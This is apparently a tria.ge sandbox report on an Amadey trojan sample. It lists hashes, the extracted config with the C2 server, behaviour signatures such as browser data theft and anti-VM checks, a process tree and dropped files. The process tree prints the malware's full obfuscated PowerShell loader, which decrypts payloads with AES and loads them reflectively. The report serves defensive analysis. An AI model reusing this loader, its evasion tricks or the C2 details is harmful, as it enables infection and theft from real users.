Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2024, 01:32

General

  • Target

    5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe

  • Size

    1.8MB

  • MD5

    9ee9fc91594ff0d745d83ae3ede6c725

  • SHA1

    27ca7f96db3ed74658fc89ca6d33db35c59d8a77

  • SHA256

    5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7

  • SHA512

    bf7d5e625fbe7adb3d1bbdc60d9263a8bb3cc000f6053033ae1ea786f7a657e5012f0f0946835b18622313e6b0f298b0e1e7aa29329f89a9f45ad440220fccef

  • SSDEEP

    49152:lkk2FX4poT387IR/vpA82dUSZ3nVZdUuHKSMuj:qk7ow7IRpd2djlV8Amu

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1232
      • C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
        "C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2580
          • C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe
            "C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:288
            • C:\Windows\system32\cmd.exe
              "cmd" /c wmic path win32_videocontroller get caption
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:680
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_videocontroller get caption
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:872
            • C:\Windows\system32\dxdiag.exe
              "dxdiag" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:264
              • C:\Windows\SysWOW64\dxdiag.exe
                "C:\Windows\SysWOW64\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\dxdiag.txt
                6⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1956
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 288 -s 1576
              5⤵
                PID:2968
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2812
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1916
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2024
            • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
              "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
              4⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2888
        • C:\Windows\SysWOW64\dialer.exe
          "C:\Windows\system32\dialer.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2536

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        cfbb28daf62bfaa9f2c408ee6f0e7d7e

        SHA1

        b5e3805f88282d30fb28d2c66431dd2beec975e6

        SHA256

        b4215e662e52a18a2a94b715d67b2a0eb353657fe9c34f0259007fbeba8e657d

        SHA512

        154619491e6a3b7f24a0557c8a32189c6944efad9726e2b695a204caf736e8587c14a7ed568f75068e52022123e2581d20d730be28d4988431c5bd72a82c2186

      • C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe

        Filesize

        560KB

        MD5

        197feb829312be2d9505c1492b6ddd16

        SHA1

        4e521c36e4fd6c7755d93f8281cc028a980b0979

        SHA256

        2a08227ca39953cd8f967682f4f101f8debdc323b63b37aa1e9ddc38b9009a12

        SHA512

        fa9b18fb32f2892a4844fcf3d29823c1375daca8b3c46ce2dd048e3b11ff2ba2acf6ef73c38e57d16712e75304c8961cf7f2dee4213dc10798f645f9d59c8cb9

      • C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd

        Filesize

        1.3MB

        MD5

        29af8022a96a28b92c651b245328807e

        SHA1

        6e757f60f7e00907841b0c5069e188864c52ba97

        SHA256

        364ff03993e1386203beb1f56e9be2fec932a7ce15e7ccb10ed045926bcda954

        SHA512

        5a086ed9f0921084aaa4d3ac113a190b3d1354c0069ff86162d751af881379590e9946bbe0d0fa3f7f9425fe1ad7959569090db31f5f596fd1dc249206f4403d

      • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe

        Filesize

        1.9MB

        MD5

        046233032238246b01f8db289d51c34c

        SHA1

        814b41c50c238de914925bd2aa25b9c8455e0ad6

        SHA256

        3ac545427f6607eed1dac90dcbd69cb41652210b046cd71f885c9a55ec30020e

        SHA512

        d902a14b34bc5bd5b8e374fcb1293c6cd2156e635ee83a7b2d162b5be1ea10488540cb8dcdbffbf94c560576fd8ee94e7cdb68995203db07309b4ee6da66e63e

      • C:\Users\Admin\AppData\Local\Temp\Cab1861.tmp

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • \Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

        Filesize

        1.8MB

        MD5

        9ee9fc91594ff0d745d83ae3ede6c725

        SHA1

        27ca7f96db3ed74658fc89ca6d33db35c59d8a77

        SHA256

        5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7

        SHA512

        bf7d5e625fbe7adb3d1bbdc60d9263a8bb3cc000f6053033ae1ea786f7a657e5012f0f0946835b18622313e6b0f298b0e1e7aa29329f89a9f45ad440220fccef

      • memory/288-42-0x0000000000400000-0x0000000000426000-memory.dmp

        Filesize

        152KB

      • memory/288-40-0x0000000000A10000-0x0000000000AA2000-memory.dmp

        Filesize

        584KB

      • memory/288-41-0x000000001A730000-0x000000001A7D0000-memory.dmp

        Filesize

        640KB

      • memory/288-45-0x0000000000660000-0x000000000067E000-memory.dmp

        Filesize

        120KB

      • memory/288-44-0x0000000000650000-0x0000000000658000-memory.dmp

        Filesize

        32KB

      • memory/288-43-0x0000000000430000-0x000000000043A000-memory.dmp

        Filesize

        40KB

      • memory/1956-68-0x0000000001D70000-0x0000000001DCC000-memory.dmp

        Filesize

        368KB

      • memory/1956-50-0x0000000000380000-0x000000000038A000-memory.dmp

        Filesize

        40KB

      • memory/1956-69-0x0000000000380000-0x000000000038A000-memory.dmp

        Filesize

        40KB

      • memory/1956-66-0x0000000001D70000-0x0000000001DCC000-memory.dmp

        Filesize

        368KB

      • memory/1956-67-0x0000000001D70000-0x0000000001DCC000-memory.dmp

        Filesize

        368KB

      • memory/1956-70-0x0000000000520000-0x000000000054A000-memory.dmp

        Filesize

        168KB

      • memory/1956-64-0x00000000004A0000-0x00000000004AA000-memory.dmp

        Filesize

        40KB

      • memory/1956-65-0x00000000004A0000-0x00000000004AA000-memory.dmp

        Filesize

        40KB

      • memory/1956-48-0x0000000000380000-0x000000000038A000-memory.dmp

        Filesize

        40KB

      • memory/1956-72-0x0000000000380000-0x000000000038A000-memory.dmp

        Filesize

        40KB

      • memory/1956-71-0x0000000000520000-0x000000000054A000-memory.dmp

        Filesize

        168KB

      • memory/2380-18-0x00000000069E0000-0x0000000006E9F000-memory.dmp

        Filesize

        4.7MB

      • memory/2380-3-0x0000000000FC0000-0x000000000147F000-memory.dmp

        Filesize

        4.7MB

      • memory/2380-2-0x0000000000FC1000-0x0000000000FEF000-memory.dmp

        Filesize

        184KB

      • memory/2380-1-0x0000000077110000-0x0000000077112000-memory.dmp

        Filesize

        8KB

      • memory/2380-0-0x0000000000FC0000-0x000000000147F000-memory.dmp

        Filesize

        4.7MB

      • memory/2380-20-0x00000000069E0000-0x0000000006E9F000-memory.dmp

        Filesize

        4.7MB

      • memory/2380-17-0x0000000000FC0000-0x000000000147F000-memory.dmp

        Filesize

        4.7MB

      • memory/2380-4-0x0000000000FC0000-0x000000000147F000-memory.dmp

        Filesize

        4.7MB

      • memory/2536-152-0x0000000000080000-0x000000000008A000-memory.dmp

        Filesize

        40KB

      • memory/2580-74-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-84-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-47-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-22-0x0000000000131000-0x000000000015F000-memory.dmp

        Filesize

        184KB

      • memory/2580-75-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-76-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-77-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-78-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-79-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-80-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-81-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-82-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-83-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-49-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-85-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-46-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-26-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-102-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-24-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-23-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-21-0x0000000000130000-0x00000000005EF000-memory.dmp

        Filesize

        4.7MB

      • memory/2580-143-0x0000000006B90000-0x0000000007058000-memory.dmp

        Filesize

        4.8MB

      • memory/2580-145-0x0000000006B90000-0x0000000007058000-memory.dmp

        Filesize

        4.8MB

      • memory/2888-146-0x0000000004C70000-0x0000000005070000-memory.dmp

        Filesize

        4.0MB

      • memory/2888-144-0x00000000009F0000-0x0000000000EB8000-memory.dmp

        Filesize

        4.8MB

      • memory/2888-150-0x0000000075540000-0x0000000075587000-memory.dmp

        Filesize

        284KB

      • memory/2888-148-0x0000000076F20000-0x00000000770C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2888-147-0x0000000004C70000-0x0000000005070000-memory.dmp

        Filesize

        4.0MB